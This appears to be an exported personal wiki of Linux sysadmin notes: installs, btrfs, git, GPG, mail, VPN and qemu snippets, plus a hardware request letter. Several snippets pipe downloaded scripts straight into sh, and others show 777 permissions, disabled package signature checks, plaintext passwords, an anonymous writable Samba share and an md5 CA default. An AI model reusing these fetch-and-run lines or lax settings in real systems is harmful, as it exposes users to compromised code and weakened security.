}}}
Watch out for alignment:
do
http://www.linuxconfig.org/linux-wd-ears-advanced-format
{{{$ fdisk -H 32 -S 32 /dev/sdx}}}
{{{
n
p
1
w
}}}
! spindown
use the wdtool to set the spindown time to something more sane than 5 seconds with the freedos bootcd. For older disks use:
{{{
hdparm -S 80 /dev/sdx
}}}
!fancy tools
{{{
xev
setxkbmap en
xlock -mode blank
}}}
!xmodmap
!! switch mod1 and mod4
{{{
clear mod1
clear mod4
add mod1 = Super_L Super_R Hyper_L
add mod4 = Alt_L Meta_L
}}}
-- Umlauts --
!! multi key for umlauts
keycode 108 = Multi_key
gives :
Alt-" + u = ü
Alt-s + s = ß
! Set up Access Point
{{{
T0$ sysctl net.ipv4.ip_forward=1
T0$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
T0$ airbase-ng -c 5 wlan1
T0$ ifconfig at0 192.168.0.1 up && dnsmasq -d
}}}
! /etc/apt/mirror.list
{{{
deb http://ftp.de.debian.org/debian squeeze main non-free contrib
}}}
! basic install
{{{
# we are using gpt, not mbr
gdisk /dev/sda
# create a 2MB grub (EF02) partition and the rest as linux partition(8200)
# ... and btrfs because all the cool kids do so
mkfs.btrfs /dev/sda2
mkdir /mnt/btrfs-root /mnt/active
mount /dev/sda2 /mnt/btrfs-root
btrfs subvolume create __active && cd __active
for i in home var usr ; do btrfs subvolume create $i; done
mount /dev/sda2 default,noatime,subvol=__active /mnt/active
# install that shit
pacstrap /mnt/active base
genfstab -p /mnt/active > /mnt/active/etc/fstab
cat >> /mnt/active/etc/fstab<<EOF
tmpfs /tmp tmpfs defaults 0 0
## to never write persistent, uncomment:
#tmpfs /var/log tmpfs defaults 0 0
EOF
arch-chroot /mnt/active
ln -s /usr/share/zoneinfo/Europe/Berlin /etc/localtime
echo "LANG=en_US.UTF-8" >> /etc/locale.conf
echo "en_US.UTF-8 UTF-8" >> /etc/locale.gen
locale-gen
echo "my-host" > /etc/hostname
mkinitcpio -p linux
pacman -S openssh grub-bios
grub-mkconfig -o /boot/grub/grub.cfg
passwd
# useradd -d /home/bob -m bob
cd /etc/netctl
cp examples/ethernet-static lan
# edit lan , try network: enp0s25 or something
netctl enable lan
systemctl enable sshd.service
grub-install /dev/sda
exit
reboot
}}}
To generate a daily report of every user to login to the machine, the following command could be run from cron :
{{{aureport -l -i -ts yesterday -te today}}}
To review all audited activity for unusual behavior, a good place to start is to see a summary of which audit rules have been triggering:
{{{aureport --key --summary}}}
If access violations stand out, review them with:
{{{ausearch --key access --raw | aureport --file --summary}}}
To review what executables are doing:
{{{ausearch --key access --raw | aureport -x --summary}}}
If access violations have been occurring on a particular file (such as /etc/shadow)
{{{ausearch --key access --file /etc/shadow --raw | aureport --user --summary -i}}}
! Automounting
!! /etc/auto.master
{{{
/media/auto /etc/auto.media --timeout=30 --ghost
}}}
/media/auto will be mounted over (do not use full folders).
{{{--ghost}}} keeps the mount Folders if unused
!! in /etc/auto.media
at first {{{blkid -o list | grep your-disk}}}
{{{
[name] -fstype=[vfat],other-options :/dev/disk/by-uuid/[your-id]
}}}
!custom hotkeys
find out the buttons you need with [[xev]], then
{{{
awful.key({ }, "XF86AudioPlay", function () awful.util.spawn("mpc toggle") end),
awful.key({ }, "XF86AudioStop", function () awful.util.spawn("mpc stop") end),
awful.key({ }, "XF86AudioNext", function () awful.util.spawn("mpc next") end),
awful.key({ }, "XF86AudioPrev", function () awful.util.spawn("mpc prev") end),
awful.key({ }, "XF86AudioLowerVolume", function () awful.util.spawn("amixer set Master 5%-") end),
awful.key({ }, "XF86AudioRaiseVolume", function () awful.util.spawn("amixer set Master 5%+") end),
awful.key({ }, "XF86AudioMute", function () awful.util.spawn("amixer set Master toggle") end),
awful.key({ }, "XF86HomePage", function () awful.util.spawn("chromium") end),
}}}
under globalkeys entry. also see [[Logitech G15]]
!Code Snippets
!! Yes/No Input
{{{
read -n1 -p "Install foo? (y/n) " #read one character
[[ $REPLY = [yY] ]] && echo sudo aptitude install foo || { echo "You didn't answer yes, or installation failed."; exit 1; }
}}}
!! Run if not yet started
{{{
pidof $TOOL >& /dev/null
if [ $? -ne 0 ]; then
$TOOL &
fi
}}}
!! Bash Case
{{{
case expression in
pattern1)
statements ;;
*) # match the rest
statements ;;
esac
}}}
!! history stats
{{{
cat ~/.histfile | awk '{a[$1]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head
}}}
!! check if group exists
{{{
getent group vboxusers &> /dev/null || groupadd -f -g 108 vboxusers
}}}
!! check if binary exists
{{{
[[ -x =git ]] || pacman -S git
#or
which git || exit 1
}}}
!! delete files oder than X Days
{{{
find /path/to/folder/ -mtime +X -exec rm {} \;
}}}
!! exec self with sudo
{{{
exec sudo "$0" "$@"
}}}
!Beagleboard Mx
http://www.watterott.com/de/BeagleBoard-xM
! installation
{{{
pacman -S btrfs btrfs-progs
}}}
! hints
see https://btrfs.wiki.kernel.org/index.php/UseCases
{{{
# mount real root
mount -osubvol=/ <fs> <mount>
mount -osubvolid=0 <fs> <mount>
# copy via cow:
alias cp='cp --reflink=always'
# mount degraded
mount -odegraded /<fs> <mount>
# real used size
btrfs fi df <mount>
# raid1 for data and meta (default: meta -> mirrored, data -> striped)
mkfs.btrfs -m raid1 -d raid1 <fs1> <fs2>
# jbod (no striping)
mkfs.btrfs -d single <fs1> <fs2>
# scan shit
btrfs dev scan
# re-balance after disk add
btrfs dev add <fs> <mount>
btrfs fi balance <mount>
# convert current fs
btrfs balance start -dconvert=raid1 -mconvert=raid1 <mount>
# remove failed device
btrfs dev delete missing <mount>
}}}
! snapshots
!! create
!! Roll back
! initial installation
{{{
#?/bin/sh
# something like this
useradd ci
punani install python-virtualenv
su ci
virtualenv buildbot
echo ". $HOME/buildbot/bin/activate" >~/.bashrc
pip install buildbot-slave buildbot
buildbot create-master master
# cp master.conf master/master.conf
buildbot reconf master
# or reconfigure as many slaves as you wish
buildslave create-slave slave localhost "ubuntu1204-local-slave" aidsballs
buildbot start master
buildslave start slave
}}}
! spoof host_name
{{{
curl --resolve host:80:ip host
}}}
! Run rxvt from Context Menu
{{{
REGEDIT4
[HKEY_CLASSES_ROOT\Directory\shell\rxvt]
@="rxv&t Here"
[HKEY_CLASSES_ROOT\Directory\shell\rxvt\command]
@="C:\\cygwin\\bin\\rxvt.exe -bg black -fg white -sr -sl 1000 -fn \"Fixedsys\" -ls -e /usr/bin/zsh --login -c \"cd '%1'; exec /bin/zsh \""
[HKEY_CLASSES_ROOT\Drive\shell\rxvt]
@="rxv&t Here"
[HKEY_CLASSES_ROOT\Drive\shell\rxvt\command]
@="C:\\cygwin\\bin\\rxvt.exe -bg black -fg white -sr -sl 1000 -fn \"Fixedsys\" -ls -e /usr/bin/zsh --login -c \"cd '%1'; exec /bin/zsh \""
}}}
! Using git+ssh through proxy
1. Get corkscrew
{{{
export http_proxy=http://g2netcache.alcatel.fr:3128/
export HTTP_PROXY=$http_proxy
wget http://ftp.uni-kl.de/pub/windows/cygwin/release/corkscrew/corkscrew-2.0-1.tar.bz2
tar xf corkscrew*
cp usr/bin/corkscrew.exe ~/bin
}}}
2. update git config
{{{
echo "export GIT_SSH=~/bin/myssh" >> ~/.zshrc
echo 'exec ssh -F ~/.ssh/config "$@"' >> ~/bin/myssh
}}}
3. update ssh config file
{{{
cat >> ~/.ssh/config << EOF
Host leechi
User makefu
HostName leechi.kicks-ass.org
Port 443
ProxyCommand corkscrew g2netcache.alcatel.fr 3128 %h %p
EOF
}}}
4. work the magic
{{{
git clone leechi:auto.git
}}}
{{{
auto gre1
iface gre1 inet tunnel
mode gre
netmask 255.255.255.255
address -ask crest-
dstaddr -ask crest-
endpoint -crest endpoint-
local -local ip-
ttl 255
}}}
!Incremental Backups
{{{
dump 0uf /path/to/backup.dump /mountpoint
# wait some time
dump 1uf /path/to/backup1.dump /mountpoint
# something is b0rken
cd /mountpoint
restore rf /path/to/backup.dump
restore rf /path/to/backup1.dump
}}}
! Restore single files
{{{
restore if /path/to/backup.dump
}}}
!Test it
{{{
dd if=/dev/zero of=virtualfs bs=1024 count=30720
losetup /dev/loop0 virtualfs
$ mkfs.ext3 /dev/loop0
...
$ mount /dev/loop0 /mnt
...
$ cd mnt;touch help ; touch me
$ dump 0uf /loop.dump /mnt # erstelle vollbackup
...
$ touch /mnt/khan
$ dump 1uf /loop1.dump /mnt # erstelle inkrementelles backup
...
$ rm /mnt/*
$ ls /mnt
[empty]
$ cd /mnt
$ restore rf ../loop.dump #vollbackup zurueckspielen
$ restore rf ../loop1.dump #inkrementelles backup zurueckspielen
$ ls /mnt
help
khan
me
}}}
! GPG
Generate:
{{{
gpg --gen-key
}}}
As signkey use Secret key and encryption key the Pubkey
Export:
{{{
gpg --export -a root@pigstarter.de > pigstarter.pub
gpg --export-secret-keys -a root@pigstarter.de > pigstarter.key
}}}
Import:
{{{
gpg --import < pigstarter.pub
gpg --import-secret-keys < pigstarter.key
}}}
! Sample Duplicity
{{{
duplicity --exclude-filelist /exclude rsync://volume-8694@rsync.hidrive.strato.com/users/volume-8694/euer --encrypt-key= --sign-key=
}}}
! Restore
{{{
duplicity restore --encrypt-key= rsync://volume-8694@rsync.hidrive.strato.com/users/volume-8694/euer /home/euer
}}}
! Focalprice
FPCUS10OFF - 10 % off
! Python
{{{
from evdev import InputDevice,categorize
from select import select
dev = InputDevice('/dev/input/by-path/pci-0000:00:1a.0-usb-0:1.2:1.0-event-mouse')
print (dev)
dev.grab()
while True:
r,w,x = select([dev], [], [])
for event in dev.read():
print(categorize(event))
}}}
!Install
!!Debian
{{{
apt-get install exim4
dpkg-reconfigure exim4-config
}}}
! grab mjpg_streamer
{{{
ffmpeg -f mjpeg -i http://lazorcam.shack/\?action\=stream -vcodec mpeg4 video_file.avi
}}}
{{{
busybox httpd
python3 -m http.server
python2 -m SimpleHTTPServer
twistd -n web --port=8080 --path=.
}}}
! cache to tmp
in {{{about:config}}}
{{{
browser.cache.disk.parent_directory = /tmp
}}}
! search in url bar
in {{{about:config}}}
{{{
keyword.URL = http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=
}}}
! join pdfs
ghostscript
{{{ gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf file1.pdf file2.pdf }}}
! tips'n'tricks
!! exclude all files currently not checked or staged
{{{
git ls-files --others >> .git/infos/exclude
}}}
!! merge another repo into the current one
{{{
git clone newrepourl
[[move the files around to fit the repo to merge into]]
cd /path/to/oldrepo
git remote add newrepo /path/to/newrepo
git fetch newrepo
git merge newrepo/master
}}}
!! ignore file mode changes
{{{
git config core.filemode false
}}}
! Git HTTP Server via apache
server side:
{{{
#apache webdav:
Alias /repos "/var/git/"
<Directory "/var/git">
Options Indexes FollowSymLinks
DAV on
allowOverride all
Order allow,deny
allow from all
</Directory>
}}}
in /var/git
{{{
mkdir bla.git
git init --bare
# .htaccess :
AuthType Basic
AuthName "Git"
AuthUserFile .ht-auth-file
Require valid-user
}}}
#
{{{
htpasswd .ht-auth-file USER
chmod +rwx .ht*
chown -R http:http *
chmod -R 777 * # i have no idea but it seems to work, make sure no new files are being created
}}}
! check in history of other repo into current
{{{
git pull /path/to/other/repo other-repo
git checkout other-repo
git log (look for latest commit of other-repo)
git reset --hard 'last-commit-of-other-repo' or git reset --hard
remotes/other-repo
# do integration magic
git checkout master
git merge other-repo
}}}
! have a clean checkout of a bare repository with git hooks
{{{
git init /home/autosync/autosync
}}}
in {{{bare-repo/hooks/post-upate}}}
{{{
#!/bin/sh
cd /home/autosync/autosync/ || exit
unset GIT_DIR
git pull origin master | logger
}}}
!basics
#edit .gnupg/options
{{{
keyserver
# wwwkeys.pgp.net
# search.keyserver.net
# pgp.ai.mit.edu
}}}
!! Get Keys and stuff
{{{
gpg --recv-keys 0x[hash]
gpg --list-keys
# get fingerprint, check with user
gpg --fingerprint [name]
gpg --sign-key [name]
gpg --edit-key [name]
# type "trust"
}}}
! Sign File
{{{
#produces a file.asc
gpg --clearsign FILE
#checks validity
gpg --verify FILE.asc
}}}
! encryption
{{{
gpg --encrypt --armor FILE
gpg --decrypt ENCRYPTED/FILE
}}}
!Anbau
Frische habanero, Kerne rauskratzen. In 50% Torf und Kakteenerde. Knapp unter der Erde. Freucht halten. In Flaches behaeltnis, Frischhaltefolie drueber.
bei 5 cm . Holzspiess, rausheben, umtopfen.
!installation
{{{
apt-get install honeyd gawk
}}}
! Auditing
audit files in /var/.audit
{{{
audisp -e login /var/.audit/audtrail
}}}
find network ip-addr
{{{
netstat -in
ifconfig lanX
}}}
! Arch Linux
{{{
iptables -F
iptables -P FORWARD DROP
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -A INPUT -p tcp --dport 1655 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables-save >/etc/iptables/iptables.rules
systemctl enable iptables.service
}}}
! get every entry in scope
{{{ldapsearch -H "ldap://justitia.jura.uni-tuebingen.de" -b o=Jura -x}}}
! get base ( o=... )
{{{ldapsearch -H "ldap://justitia.jura.uni-tuebingen.de" -b "" -s base -x}}}
! Change Colors
{{{
change colors for files:
dircolors -p > .dircolors
#edit colorfile
#in .someShellrc
if [ -f "$HOME/.dircolors" ] ; then
eval `dircolors -b "$HOME/.dircolors"`
export LS_COLORS
fi
}}}
without "eval"
{{{
dircolors -p > dircolors.txt
vim dircolors.txt
dircolors -b ~/dircolors.txt >> .zshrc
}}}
Mausezahn is a fast traffic generator written in C which allows you to send nearly every possible and impossible packet.
! Documentation
website: http://www.perihel.at/sec/mz/
Docu path: /usr/share/doc/mz
! DNSSec
! PicUntu on mk808
!! burn finless custom image (+root)
YOU WILL NEED **WINDOWS** FOR THAT
* grab from http://www.freaktab.com/showthread.php?3857-NEW-MK808-quot-all-models-quot-Finless-1-7 your image
* Power off android -> hold button under 'not led' pinhole -> power on -> unknown device in windows
* Install Driver in finless /driver folder
* Finless ROM Flash Tool
-> Choose as Recovery : http://code.google.com/p/rk3066-linux/
-> Flash ROM
!! install the linux image
! Get Wifi Working
{{{echo "bcm40181" > /etc/modules}}} or {{{modprobe bcm40181}}}
!! iwlist scan
... is not working, use the following
{{{
echo "ctrl_interface=/var/run/wpa_supplicant" > /etc/wpa.conf
wpa_supplicant -i eth0 -c /etc/wpa.conf -B
wpa_cli scan
sleep 5
wpa_cli scan_results
}}}
! config
in {{{/etc/mpd.conf}}}, there is a great sample config file, fit that one for your needs.
!! Sample config
{{{/usr/share/mpd/mpd.conf.example}}}
!! Quick config
{{{
music_directory "/home/user/music" # Your music dir.
playlist_directory "/var/lib/mpd/playlists"
db_file "/var/lib/mpd/mpd.db"
log_file "/var/log/mpd/mpd.log"
pid_file "/var/run/mpd/mpd.pid"
state_file "/var/lib/mpd/mpdstate"
mixer_type "software" # independent volume
}}}
! fixing "Alsa device Busy"
in {{{/etc/mpd.conf}}}
{{{
audio_output {
type "alsa"
name "Sound Card"
options "dev=dmixer"
device "plug:dmix"
}
}}}
! update database
{{{
mpc update
}}}
! Clients
Check out following clients
* mpc (old school)
* ncmpcpp (hot shit)
!webcam
{{{
mplayer tv:// -tv driver=v4l2:width=320
}}}
! Install
{{{
aptitude install msmtp-mta
# pacman -S msmtp-mta
}}}
! Configure
in /etc/msmtprc
{{{
defaults
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
account default
host smtp.gmail.com
port 587
auth on
user username@gmail.com
password mypass
from username@gmail.com
logfile /var/log/msmtp.log
}}}
chmod 600 /etc/msmtprc
! html view
in .mailcap
{{{
text/html;w3m -dump '%s' -O utf-8 -I %{charset} ; copiousoutput; description=HTML Text; nametemplate=%s.html
}}}
in .muttrc
{{{
auto_view text/html
}}}
! smime
{{{
echo "source /usr/share/doc/mutt/samples/smime.rc" >> ~/.muttrc
smime_keys init
wget http://services.support.alcatel-lucent.com/PKI/rootCA.crt
smime_keys add_root rootCA.crt
# create private CA and derive mail certificate (see below)
# OR
# get free trusted Certificate from http://www.comodo.com/home/email-security/free-email-certificate.php
smime_keys add_p12 mail.p12
echo 'set smime_default_key="<see output above>"' >> ~/.muttrc
mutt
# receive signed mail of crypto partner
## CTRL-K
#fix the ~/.smime/certificates/.index as extraction of complete chains does not work correctly as of today (31.01.2012) see Mutt #3559
}}}
!! Create own CA
{{{
mkdir ca
openssl req -new -x509 -keyout ca/rooty.key -out ca/root.pem -days 9001
openssl rsa -in ca/rooty.key > ca/root.key
rm ca/rooty.key
cat > root.cnf <<EOF
[ ca ]
default_ca = ca_default
[ ca_default ]
dir = ./ca
certs = $dir
new_certs_dir = $dir/ca.db.certs
database = $dir/ca.db.index
serial = $dir/ca.db.serial
RANDFILE = $dir/ca.db.rand
certificate = $dir/ca.crt
private_key = $dir/ca.key
default_days = 365
default_crl_days = 30
default_md = md5
preserve = no
policy = generic_policy
[ generic_policy ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
EOF
echo '100001' >ca/ca.db.serial
touch ./ca/ca.db.index
mkdir ./ca/ca.db.certs
openssl req -new -keyout mail.key -out mail.csr -days 9001
openssl ca -config root.cnf -out mail.crt -infiles mail.csr
openssl pkcs12 -export -inkey mail.key -certfile ca/root.crt -out mail.p12 -in mail.crt
smime_keys add_root ca/root.crt
smime_keys add_cert ca/root.crt
# add private certificate
}}}
! [[offlineimap]]
! change root pass
{{{
mysqladmin -u root password NEWPASSWORD
}}}
! mysql testing
{{{
map -p 3306 1.2.3.4 --script mysql-audit \
--script-args "mysql-audit.filename='nselib/data/mysql-cis.audit'\
,mysql-audit.username='root',mysql-audit.password='foobar'"
}}}
! POST and PRE commands
in {{{ /etc/network.d/interfaces/$INTERFACE }}}
{{{
POST_DOWN="pkill dropbox; echo 'Killed Dropbox'"
POST_UP="sleep 5;sudo -u makefu dropboxd&"
}}}
! share data
network-address/subnet
{{{
echo "/share 192.168.0.0/24(ro,async)">>/etc/exports
exportfs -ar
/etc/rc.d/nfs-server restart
}}}
! mount data
{{{
mount -t nfs 192.168.0.1:/share /mnt
}}}
! using for virtualbox behind nat
you will need the "insecure" flag!
{{{
/home/makefu/repos/harden *(rw,sync,no_subtree_check,all_squash,anonuid=1000,anongid=1000,insecure)
}}}
! quirks
{{{
nmap script smtp-open-relay.nse --script-args smtp-open-relay.domain=gmail.com -p 25,465,587 <host>
}}}
{{{
git clone --depth 1 https://github.com/joyent/node.git
cd node
export JOBS=2 # optional, sets number of parallel commands.
mkdir ~/local
./configure --prefix=$HOME/local/node
make
make install
export PATH=$HOME/local/node/bin:$PATH
# npm
curl http://npmjs.org/install.sh | sh
}}}
! .offlineimaprc
!! Mailbox names
required for mutt:
{{{
[mbnames]
enabled= yes
filename= ~/.mutt/muttrc.mailboxes
header = "mailboxes
peritem = =%(foldername)s
sep = " "
footer = "\n"
}}}
in {{{.muttrc}}} append {{{source $HOME/.mutt/muttrc.mailboxes}}}
!Infos
!! Single Instance Virtual Machine Installation
https://uksysadmin.wordpress.com/2011/02/17/running-openstack-under-virtualbox-a-complete-guide/
This guide has some problems with authenticating the new repository and adding the public key
! Multi Instance
http://docs.openstack.org/openstack-compute/admin/content/ch03.html
! troubleshooting
{{{
echo net.ipv4.ip_forward >> /etc/sysctl.cfg
}}}
!! look in /var/log/libvirt/
Certificates, verificaten and Stuff
! get ssl fingerprint
{{{
echo Q |openssl s_client -connect syntax-fehler.de:993 > out.pem
# edit out.pem , remove everything outside of ----BEGIN and ---END
openssl x509 -in out.pem -sha1 -noout -fingerprint
}}}
! Yaourt mirror
in {{{/etc/pacman.conf}}}
{{{
[archlinuxfr]
Server = http://repo.archlinux.fr/$arch
SigLevel = Optional TrustAll
}}}
!! local mirror
exclude file for rsync: {{{/path/to/exclude.txt}}}
{{{
iso
testing
#Exclude i686 Packages
*/os/i686
pool/*/*-i686.pkg.tar.xz
pool/*/*-i686.pkg.tar.gz
#Exclude x86_64 Packages
*/os/x86_64
pool/*/*-x86_64.pkg.tar.xz
pool/*/*-x86_64.pkg.tar.gz
}}}
!! Use rsync
{{{
rsync --exclude-from=$EXCLUDE_FILE -rtlHq --delete-after rsync://path/to/repo /path/to/lopcal/repo
}}}
! Creating a mirror
{{{
#!/bin/bash
set -x
# Configuration
SOURCE='rsync://ftp5.gwdg.de/pub/linux/archlinux/'
DEST='/srv/mirrors/archlinux'
EXCLUDE_FILE='/path/to/exclude.txt'
BW_LIMIT='500'
REPOS='core extra community'
RSYNC_OPTS='-rtlHq --delete-after --delay-updates --copy-links --safe-links --max-delete=1000 --bwlimit=500 --delete-excluded'
LCK_FLE=/tmp/rsync-mirror.lck'
# Make sure only 1 instance runs
if [ -e "$LCK_FLE" ] ; then
OTHER_PID=`/bin/cat $LCK_FLE`
echo "Another instance already running: $OTHER_PID"
exit 1
fi
echo $$ > "$LCK_FLE"
for REPO in $REPOS ; do
echo "Syncing $REPO"
/usr/bin/rsync $RSYNC_OPTS ${SOURCE}/${REPO} ${DEST}
done
# Cleanup
/bin/rm -f "$LCK_FLE"
exit 0
}}}
!Request for a pandaboard
Felix Richter
Burgunderstr. 39
70435 Stuttgart
Germany
Hi, this is Felix Richter from Germany. I am a member of the german Hackerspace Shackspace (www.shackspace.de) and here we are working on a large number of Open Source and simply cool projects. For example two cool members hacked an electronic lock in order to make physical keys obsolete and provide a way to open the lock with your very own ssh private key (http://shackspace.de/wiki/doku.php?id=project:white_box) and we even have our own arduino implementation Shackuino ( http://shackspace.de/wiki/doku.php?id=project:shackuino). Currently we are forced out of our current rooms and have to find a new one until February 28. Every day new projects come to the mind of the members and it would be great if we could get support for our cause.
In addition to that we have another project called genericore ( http://shackspace.de/wiki/doku.php?id=project:genericore) which uses a message queueing system in order to collect data from different sources, process these data (e.g. generate statistics from the data) and then send them to different outputs (like html,xmpp,irc and so on). The pandaboard could provide a module which sends the collected data from the wireless sensor network to this message queue. In addition to that, it can provide other modules which only work at our location (e.g. check how many clients are currently connected to our network via asking our snmp enabled router how many clients are in the arp table and then arp-scan all clients for better results https://github.com/shackspace/genericore-snmp_users)
The pandaboard is just like the greatest thing we could ever hope for our projects, it is just incredible flexible, has all(and more) extensions we could possibly need and uses nearly no energy, which is great to keep it on 24/7 in our location without the fear of a too high energy bill. This of course is great for our statistics generation and information gathering approach because we would love to have continuous data from all the sensors and modules.
We were looking for a long time for such a platform. It even enables more projects here at our hackerspace to fold out because the pandaboard has enough power (2core cpu) to work in many different projects at the same time!
! quick tweaks
do it dirty, write in {{{/etc/rc.local}}}
{{{
echo deadline > /sys/block/sda/queue/scheduler #deadline io scheduler
echo ondemand >/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor #ondemand scheduler
}}}
also see [[swapdisk]]
Quick ping-scan
{{{
1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("192.168.137.$_", 10) } | where-object { $_.Status -eq "Success" } | select $_.Address.Address
}}}
!prepare
{{{
pacman -S qemu
ln -s /usr/bin/qemu-system-x86_64 /usr/bin/qemu
}}}
!the whole thingy
{{{
qemu-img create -f qcow2 boot.img 10G
qemu \
-enable-kvm \ # use it
-m 512 \ # available memory
-hda boot.img \
-cdrom isos/archlinux-2013.02.01-dual.iso \
-boot d \ # boot iso
-vnc :1 \ # vncviewer :1
-net nic,macaddr=00:00:00:00:00:00 -net user \ # user mode network (dhcp, ping does not work)
-redir tcp:2222::22 # IP-forwarding which arrive at host port 2222 to client port 22
}}}
! create qemu snapshot
{{{
qemu-img create -f qcow2 -b rhel.img rhel-snap.img
qemu .... -hda rhel-snap.img
#using rhel.img will corrupt the snapshot
}}}
detach programs, for example from interactive session into screen session
! Troubleshooting
{{{
echo 0 > /proc/sys/kernel/yama/ptrace_scope
}}}
! Tips
{{{
# get all packages with given format (here csv)
rpm -qa --qf '"%{NAME}","%{VERSION}\n"'
}}}
!caveeats
#warnings about "lchown" in logs:
{{{perl -MCPAN -e 'install qw(Lchown)'}}}
! install rvm
{{{
curl -L https://get.rvm.io | bash -s stable
}}}
! usage
{{{
# try`rvm autolibs enable`
rvm autolibs enable
# rvm requirements 1.9.3 | sed 's/,//g'
rvm install 1.9.3
rvm use --default 1.9.3
}}}
! Anonymous Samba Share
!! Create Samba Config
in {{{/etc/samba/smb.conf}}}
{{{
[global]
# this disables all the authentication with 'guest ok'
#security = SHARE
[temp]
comment = Shared
path = /home/samba
force user = sambaman
force group = users
read only = No
guest ok = Yes
}}}
!! Create Samba User
{{{
useradd -c "Sambaman" -m -g users -p "moar samba browsing fuck yeah" sambaman
}}}
!! Restart
{{{
systemctl restart smbd
}}}
{{{
altscreen on
term screen-256color
hardstatus alwayslastline
hardstatus string '%{= kG}[ %{G}%H %{g}][%= %{= kw}%?%-Lw%?%{r}(%{W}%n*%f%t%?(%u)%?%{r})%{w}%?%+Lw%?%?%= %{g}][%{B} %m-%d %{W}%c %{g}]'
}}}
! Resources
http://wiki.centos.org/HowTos/SELinux
http://www.centos.org/docs/5/html/5.2/Deployment_Guide/sec-sel-use-audit2allow.html
! Commands
{{{
sestatus
setenforce -- toggle between enforcing and permissive
/etc/selinux/config --
ls -Z
ps axZ
id -Z -- show security context
chcon -v --type=httpd_sys_content_t /html -- change the context of the file
semanage fcontext -a -t httpd_sys_content_t "/html(/.*)?" -- make context permanent between reboots
restorecon -v /var/www/html/index.html -- restore the security context of a file (after cp)
restorecon -Rv -n /var/www/html -- check if security context changes happened
touch /.autorelabel -- trigger complete relabeling of file system
grep smtpd_t /var/log/audit/audit.log | audit2allow -M postgreylocal -- create policy file from audit logfile
semodule -i postgreylocal.pp -- load the new module
semodule -l -- check if module is loaded
}}}
! gnu alternatives
!! readlink -f
{{{
canonicalpath() {
if [ -d $1 ]; then
pushd $1 > /dev/null 2>&1
echo $PWD
elif [ -f $1 ]; then
pushd $(dirname $1) > /dev/null 2>&1
echo $PWD/$(basename $1)
else
echo "Invalid path $1"
fi
popd > /dev/null 2>&1
}
}}}
{{{
canonicalize(){
cd -P -- "$(dirname -- "$1")" &&
printf '%s\n' "$(pwd -P)/$(basename -- "$1")"
}
}}}
!! mount -o bind
{{{
mount -F lofs DIR1 DIR2
}}}
! .ssh/config
{{{
Host $hostname
User $username
Port $port
HostName $ipOrHostname
IdenitityFile $pathToFile
}}}
! remote commands
{{{
ssh user@host 'path-to-remote-command'
}}}
!! Proxy Through SSH
{{{
ProxyCommand ssh external.example.net %h:22
}}}
!! Chrooting
{{{
#?/bin/sh
groupadd sftp
useradd -d /opt/u -m -N -g sftp u
mkdir /opt/u/.ssh
echo "PUBKEY" > /opt/u/.ssh/authorized_keys
mkdir /opt/u/editable
chown u:sftp -R /opt/u/
chown root:sftp /opt/u/
chmod 750 -R /opt/u/
cat >>/etc/ssh/sshd_config <<EOF
Subsystem sftp /usr/lib/openssh/sftp-server
Match User u
AllowTCPForwarding no
X11Forwarding no
PasswordAuthentication no
Match Group sftp
ChrootDirectory %h
ForceCommand internal-sftp
EOF
}}}
!create swap from file
{{{
truncate --size 8G /swapfile
mkswap /swapfile
swapon /swapon
}}}
!! /etc/fstab
{{{
echo "/swapfile none swap defaults 0 0" >> /etc/fstab
}}}
!minimize swappiness
{{{
echo 0 > /proc/sys/vm/swappiness
}}}
!! after reboot
in {{{/etc/sysctl.conf}}}
{{{
vm.swappiness=1
}}}
! run shit in tmux
in {{{/etc/systemd/system/start-shit.service}}}
{{{
[Unit]
Description=start shit
[Service]
Type=oneshot
RemainAfterExit=yes
KillMode=none
User=root
ExecStart=/usr/bin/tmux new-session -s %u -d '<my cool script>'
ExecStop=/usr/bin/tmux kill-session -t %u
[Install]
WantedBy=multi-user.target
}}}
! call rc.local
in {{{/etc/systemd/system/rc-local.service}}}
{{{
[Unit]
Description=/etc/rc.local Compatibility
ConditionPathExists=/etc/rc.local
[Service]
Type=oneshot
ExecStart=/etc/rc.local start
StandardOutput=tty
RemainAfterExit=yes
SysVStartPriority=99
[Install]
WantedBy=multi-user.target
}}}
Tinc is your virtual private network.
!logging
Get infos from current network
see also github->makefu->retiolum
{{{
sudo tincd -n retiolum --kill=USR2 --user=tincd --chroot
}}}
run with
{{{
tincd --user=tincd --chroot -n retiolum
}}}
!installation
Use this installation with great caution!
{{{
curl tinc.krebsco.de | HOSTN=krebsbobkhan sh
}}}
! v6-only host routing to v4 via tinc
!! server (pigstarter)
{{{
#?/bin/sh
# forwarding
echo "net.ipv6.conf.conf.all.forwarding=1">> /etc/sysctl.conf
sysctl net.ipv6.conf.conf.all.forwarding=1
# ufw
sed -i 's/\(DEFAULT_FORWARD_POLICY=\).*/\1"ACCEPT"/' /etc/default/ufw
service ufw restart
# tinc config
echo "Subnet = 0.0.0.0/0" >> /etc/tinc/retiolum/hosts/pigstarter
}}}
!! client (irkel)
{{{
cat >>/etc/tinc/retiolum/tinc-up <<EOF
ip addr add 10.243.0.153 dev \$INTERFACE
ip addr add default dev \$INTERFACE
EOF
}}}
! Building on amazon ec2 aws instance
{{{
#!/bin/sh
set -e
sudo yum install -y gcc openssl-devel
mkdir build
cd build
curl http://www.oberhumer.com/opensource/lzo/download/lzo-2.04.tar.gz | tar xz
cd lzo-2.04
./configure --prefix=/usr
make
sudo make install
cd ..
curl http://www.tinc-vpn.org/packages/tinc-1.0.13.tar.gz | tar xz
cd tinc-1.0.13
./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var
make
sudo make install
}}}
create sessions on startup
{{{
tmux start-server
tmux new-session -d -s daemons -n daemons
tmux new-window -t daemons:1
tmux new-window -t daemons:2
tmux new-window -t daemons:3
tmux new-window -t daemons:4
tmux send-keys -t daemons:0 'dropboxd' C-m
tmux send-keys -t daemons:1 'offlineimap' C-m
